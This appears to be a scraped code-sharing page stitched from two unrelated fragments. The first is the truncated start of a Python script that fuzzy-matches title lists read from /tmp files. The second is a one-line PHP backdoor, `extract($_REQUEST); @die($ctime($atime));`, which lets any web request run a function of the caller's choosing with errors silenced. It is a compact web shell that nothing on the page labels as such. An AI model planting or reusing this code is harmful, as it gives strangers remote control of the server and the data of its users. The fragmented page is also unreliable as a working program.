This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from fuzzywuzzy import fuzz | |
from fuzzywuzzy import process | |
from collections import Counter | |
A_title_file = "/tmp/A_titles.txt" | |
B_title_file = "/tmp/B_titles.txt" | |
# Open the files and get the titles | |
A_titles = [] | |
with open(A_title_file) as f: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php extract($_REQUEST); @die($ctime($atime)); |